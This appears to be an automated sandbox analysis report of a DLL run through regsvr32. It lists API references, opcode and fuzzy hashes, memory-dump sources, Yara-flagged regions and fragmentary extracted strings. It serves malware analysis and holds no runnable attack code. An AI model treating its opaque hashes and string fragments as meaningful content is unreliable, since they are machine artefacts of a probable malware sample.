                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$HandleModuleNameWrite
                                                                                                                                      • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                                      • API String ID: 3784150691-4022980321
                                                                                                                                      • Opcode ID: a3f87b8c5f367064f797f5b9ceb23e0cb6ebb80f3dcd78d3f9f2145c33283283
                                                                                                                                      • Instruction ID: fc4e3c4448244111ef26b07103990be644f3ea7aece92676bcf4129f8e04d64d
                                                                                                                                      • Opcode Fuzzy Hash: a3f87b8c5f367064f797f5b9ceb23e0cb6ebb80f3dcd78d3f9f2145c33283283
                                                                                                                                      • Instruction Fuzzy Hash: 9751CF61B0C66BC2FB20D727A9797BA5351BF85398F404A36EE0D46AD6DE2CE145C230
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3778485334-0
                                                                                                                                      • Opcode ID: 44244c45948aa76910f1429c67e23cf948153936c8457040e3babb9890c0c3d8
                                                                                                                                      • Instruction ID: 835de6b9e652350efb2490cfc6edece73ba395b1f6558e5f85fab940c80424bf
                                                                                                                                      • Opcode Fuzzy Hash: 44244c45948aa76910f1429c67e23cf948153936c8457040e3babb9890c0c3d8
                                                                                                                                      • Instruction Fuzzy Hash: 8331E375A0CB6AC5EB50DB12F86436A73A4FF85348F500936EA8D42B64EF7CE048C720
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • _lock.LIBCMT ref: 00007FFC6720E6EB
                                                                                                                                      • free.LIBCMT ref: 00007FFC6720E7E2
                                                                                                                                        • Part of subcall function 00007FFC67203024: HeapFree.KERNEL32(?,?,00000000,00007FFC67202DDC,?,?,?,00007FFC67202DFF,?,?,?,00007FFC6720254F,?,?,?,00007FFC6720262A), ref: 00007FFC6720303A
                                                                                                                                        • Part of subcall function 00007FFC67203024: _errno.LIBCMT ref: 00007FFC67203044
                                                                                                                                        • Part of subcall function 00007FFC67203024: GetLastError.KERNEL32(?,?,00000000,00007FFC67202DDC,?,?,?,00007FFC67202DFF,?,?,?,00007FFC6720254F,?,?,?,00007FFC6720262A), ref: 00007FFC6720304C
                                                                                                                                      • ___lc_codepage_func.LIBCMT ref: 00007FFC6720E76B
                                                                                                                                        • Part of subcall function 00007FFC67206550: RtlCaptureContext.KERNEL32 ref: 00007FFC6720658F
                                                                                                                                        • Part of subcall function 00007FFC67206550: IsDebuggerPresent.KERNEL32 ref: 00007FFC6720662D
                                                                                                                                        • Part of subcall function 00007FFC67206550: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFC67206637
                                                                                                                                        • Part of subcall function 00007FFC67206550: UnhandledExceptionFilter.KERNEL32 ref: 00007FFC67206642
                                                                                                                                        • Part of subcall function 00007FFC67206550: GetCurrentProcess.KERNEL32 ref: 00007FFC67206658
                                                                                                                                        • Part of subcall function 00007FFC67206550: TerminateProcess.KERNEL32 ref: 00007FFC67206666
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _errno$ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerErrorFreeHeapLastPresentTerminate___lc_codepage_func_lockfree
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 178205154-0
                                                                                                                                      • Opcode ID: 74de64cbd29ae749c01db9c906a5c8058d145dff36747eda2fd1744b72fc25a1
                                                                                                                                      • Instruction ID: 1d6b77440f4bd4b5836b34dca1301174c4171344e07ea53ff4c72e2ed7e8db77
                                                                                                                                      • Opcode Fuzzy Hash: 74de64cbd29ae749c01db9c906a5c8058d145dff36747eda2fd1744b72fc25a1
                                                                                                                                      • Instruction Fuzzy Hash: ABD1D672E0C1AAC5E720AF26D47867A6B92BF85748F404935DA8D13795DF3CE891C730
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFC6720E1C2), ref: 00007FFC6720DFF2
                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFC6720E1C2), ref: 00007FFC6720E004
                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFC6720E1C2), ref: 00007FFC6720E04F
                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFC6720E1C2), ref: 00007FFC6720E0E1
                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFC6720E1C2), ref: 00007FFC6720E11B
                                                                                                                                      • free.LIBCMT ref: 00007FFC6720E12F
                                                                                                                                        • Part of subcall function 00007FFC67206C34: _FF_MSGBANNER.LIBCMT ref: 00007FFC67206C64
                                                                                                                                        • Part of subcall function 00007FFC67206C34: RtlAllocateHeap.NTDLL(?,?,00000000,00007FFC672030C0,?,?,00000000,00007FFC67206B19,?,?,00000000,00007FFC67206BC3), ref: 00007FFC67206C89
                                                                                                                                        • Part of subcall function 00007FFC67206C34: _errno.LIBCMT ref: 00007FFC67206CAD
                                                                                                                                        • Part of subcall function 00007FFC67206C34: _errno.LIBCMT ref: 00007FFC67206CB8
                                                                                                                                      • GetLocaleInfoA.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFC6720E1C2), ref: 00007FFC6720E145
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InfoLocale$_errno$AllocateByteCharErrorHeapLastMultiWidefree
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2309262205-0
                                                                                                                                      • Opcode ID: 71a04b091aa06e394b105ea5eb29500c7d2471e259f2c6ae1c50144f40b044a4
                                                                                                                                      • Instruction ID: 31d3b9a99d2f9d17f5d0be31e920eb8fc45f0da1e123992f7c68c0157eb8c139
                                                                                                                                      • Opcode Fuzzy Hash: 71a04b091aa06e394b105ea5eb29500c7d2471e259f2c6ae1c50144f40b044a4
                                                                                                                                      • Instruction Fuzzy Hash: F2518232E0C66AC6E760AF2298685696392FF447ACF541935EB1D13B94CF7DE984C320
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _errno$DecodePointer_lock
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2175075375-0
                                                                                                                                      • Opcode ID: e83d4e1a308f3a4c606242a395cb5e969118d697d0d9f70e8103cd5b86654c3e
                                                                                                                                      • Instruction ID: 24833381d88700180ea52a012ec443f7f32ebf970a13d9e4948fed2cfa7c52eb
                                                                                                                                      • Opcode Fuzzy Hash: e83d4e1a308f3a4c606242a395cb5e969118d697d0d9f70e8103cd5b86654c3e
                                                                                                                                      • Instruction Fuzzy Hash: 80315222A1C76AC2FB15AA63957977B6391AF84788F044834DF0C4BB86EF2CD451C734
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1269745586-0
                                                                                                                                      • Opcode ID: 4b9ca92828b1b5c60ed307038ce46a3bf90eb6ca82a158dafa7f71ad6e682487
                                                                                                                                      • Instruction ID: 640e0f853e4395b2a7cfee7997b7bf3c6d962e7f70c4b1e29c67b687c7e87d12
                                                                                                                                      • Opcode Fuzzy Hash: 4b9ca92828b1b5c60ed307038ce46a3bf90eb6ca82a158dafa7f71ad6e682487
                                                                                                                                      • Instruction Fuzzy Hash: 18313076A0CB96C2DA24CB55E4953ABB3A0FF95748F400535D78D43A59EF3CD189CB10
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: "+H$1l7.$M8;$]$d$]k$]k$94
                                                                                                                                      • API String ID: 0-2447245168
                                                                                                                                      • Opcode ID: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                                                                                      • Instruction ID: 1221e244f5383d3e6569bf50eb566ee92e7d288cf12f4405919b94e37960c7a7
                                                                                                                                      • Opcode Fuzzy Hash: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                                                                                      • Instruction Fuzzy Hash: 3FB10D7160130CCBDBA9DF28C18A6DA3BE1FF48748F114129FD1A97261D774E919CB46
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InfoLocale
                                                                                                                                      • String ID: ACP$OCP
                                                                                                                                      • API String ID: 2299586839-711371036
                                                                                                                                      • Opcode ID: 388ed1ec509bc17a1b1080bf0c7b12a90c89964bfa9f21f0ca41505682e31820
                                                                                                                                      • Instruction ID: 8d4e941a129a1d1ed0c4924334c112150d49eb2a4adcb626260f19275c110cab
                                                                                                                                      • Opcode Fuzzy Hash: 388ed1ec509bc17a1b1080bf0c7b12a90c89964bfa9f21f0ca41505682e31820
                                                                                                                                      • Instruction Fuzzy Hash: 432165A1B0C55BC1FA20CB23E9642F9A3A1FF44B8CF445A31DA4D47555EE2CE585C730
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 1h$I-$IY$QL&$li7$o
                                                                                                                                      • API String ID: 0-890095520
                                                                                                                                      • Opcode ID: d92cde7f9b8773e82faae5f21764c68a430e9ac7962d305d8d3ec3a014b69236
                                                                                                                                      • Instruction ID: 3309774e0679b3a301b7d0c809474a48ec240f33eb9a68417431e078f6a2137f
                                                                                                                                      • Opcode Fuzzy Hash: d92cde7f9b8773e82faae5f21764c68a430e9ac7962d305d8d3ec3a014b69236
                                                                                                                                      • Instruction Fuzzy Hash: 72921875604BC88BCBB8DF24DC85BDD7BE0FB86305F20561DD85E9AA60CBB85645CB02
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 1$ {,$"$$-%$Rku$ i
                                                                                                                                      • API String ID: 0-1845893065
                                                                                                                                      • Opcode ID: 8a8483899f0d6f446eebdfc8e7bf7c7542960c12dc616770c4deeefd42d211ba
                                                                                                                                      • Instruction ID: cb6ea2ed9b9de3b3effb5fe074f3157ffd1060f729125c5012da7c2884d2f589
                                                                                                                                      • Opcode Fuzzy Hash: 8a8483899f0d6f446eebdfc8e7bf7c7542960c12dc616770c4deeefd42d211ba
                                                                                                                                      • Instruction Fuzzy Hash: EB52D470544BCA8BCBB8CF24CC85BEF7BA0FB44306F155529D89A8A291DBB85749CF41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: VUS/$YV~$p$@$EX$OX
                                                                                                                                      • API String ID: 0-2743166816
                                                                                                                                      • Opcode ID: 5155f202f137bac6474ba6043cf7c54f40f5ffdfe883d22239fc44ed7813b08b
                                                                                                                                      • Instruction ID: 6ceb6cba6b0314249f0ec67deadc173c496f62a90fe3cec01f017443767c42d8
                                                                                                                                      • Opcode Fuzzy Hash: 5155f202f137bac6474ba6043cf7c54f40f5ffdfe883d22239fc44ed7813b08b
                                                                                                                                      • Instruction Fuzzy Hash: BD3213711097848FD3A9CF68C58A65BBBF0FBCA744F104A1DF68687260C7B6D949CB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: -!zt$Mv`b$R3T$d}9J$t:v$ru
                                                                                                                                      • API String ID: 0-2100131636
                                                                                                                                      • Opcode ID: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                                                                                      • Instruction ID: abddbd47ac15f5a8ffacaf8e31a06efd054a3dbd2afb1a66e8bbaa14beb483a4
                                                                                                                                      • Opcode Fuzzy Hash: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                                                                                      • Instruction Fuzzy Hash: C1221BB050478C8BDBB8CF64C9897DD7BB0FB44308F10862DDA5AAB250CBB45686CF59
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $$"`2$lbzZ$lmq$tro$kO
                                                                                                                                      • API String ID: 0-2401169580
                                                                                                                                      • Opcode ID: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                                                                                      • Instruction ID: 279b0f6eedbbacd77816cba7ac57bf6919de5fbe0bc464da326619847ce4fcd1
                                                                                                                                      • Opcode Fuzzy Hash: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                                                                                      • Instruction Fuzzy Hash: BBF1C3709047488FDBA8DFA8D9867DDBBB1FB48304F20821DD84AEB255DB749A49CF41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1445889803-0
                                                                                                                                      • Opcode ID: 223c3edd6aa26ef4227c63ba9b3a174b47cd905fe72dc54f34602d1df15ca246
                                                                                                                                      • Instruction ID: d65d4dcf2e10f5e296c943d78686bf8447ba243fcab48474fff7d649fdc2e664
                                                                                                                                      • Opcode Fuzzy Hash: 223c3edd6aa26ef4227c63ba9b3a174b47cd905fe72dc54f34602d1df15ca246
                                                                                                                                      • Instruction Fuzzy Hash: 4901526171DA19C1EB40CF22E8A42697360FF46B94F456930EF5E47790DE3CD995C320
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: )#?$EX.$PT$UbA$2f
                                                                                                                                      • API String ID: 0-1318892062
                                                                                                                                      • Opcode ID: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                                                                                      • Instruction ID: a9b5704be98d3dd027f678fe08c59eda011257bdda9cf4ed25ea0f7660729633
                                                                                                                                      • Opcode Fuzzy Hash: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                                                                                      • Instruction Fuzzy Hash: 8B320DB190078C8BDBB8CF64C8856DD7BF0FB48318F50852DEA1A9B251DBB45685CF98
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $T$?F$QP|m$qjf$tZp
                                                                                                                                      • API String ID: 0-3477398917
                                                                                                                                      • Opcode ID: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                                                                                      • Instruction ID: e54beaa769b94aae3cb673a52a2b60ade73482c6e5d3d936cdc9b6ae13d51efd
                                                                                                                                      • Opcode Fuzzy Hash: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                                                                                      • Instruction Fuzzy Hash: 0B122870A0470CDFCF69DFA8C08A6DDBBF2FB44344F1091A9E816AB261D7759A19CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: JQ$k&($t$v$x\J
                                                                                                                                      • API String ID: 0-1134872184
                                                                                                                                      • Opcode ID: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                                                                                      • Instruction ID: 7c1fd17b310acde7e359d6be57bcfb6c2dd011f2caef592e77d3cba241376f6b
                                                                                                                                      • Opcode Fuzzy Hash: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                                                                                      • Instruction Fuzzy Hash: F312E0B0504709EFCB99DF28C18AADE7BF0FB48308F40812AF80A9B254D774DA58DB45
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: R$)H8$?rIc$L==$V
                                                                                                                                      • API String ID: 0-2512384441
                                                                                                                                      • Opcode ID: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                                                                                      • Instruction ID: 6f6f9af97a41f07aad9f9d1cbd67af5334817a93c453241fb2a5d498ae2065c2
                                                                                                                                      • Opcode Fuzzy Hash: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                                                                                      • Instruction Fuzzy Hash: 3541D0B090074E8BCF48CF64D49A5DE7FB0FB68398F20421DE856A6250D3B896A5CFC5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Qq$bt$vird$+$S
                                                                                                                                      • API String ID: 0-3373980505
                                                                                                                                      • Opcode ID: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                                                                                      • Instruction ID: 8c34661c01ca41a1498f33dadfb9b2381b3c020394efcb6cfebc1cbd8490f91c
                                                                                                                                      • Opcode Fuzzy Hash: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                                                                                      • Instruction Fuzzy Hash: 8831C2B081038A8FDB45CF64C88A5DE7BF0FB58358F115A19F869A6250D3B4D668CF81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InfoLocale$_getptd
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1743167714-0
                                                                                                                                      • Opcode ID: b0fda2b9e43f1133ad190798799e4c2ffbba67a865a56d93994de7f284044248
                                                                                                                                      • Instruction ID: 82ee01515c052a84ced36173fff1a2c44c8355a6915e9c9ff7ffed6c38b41f7f
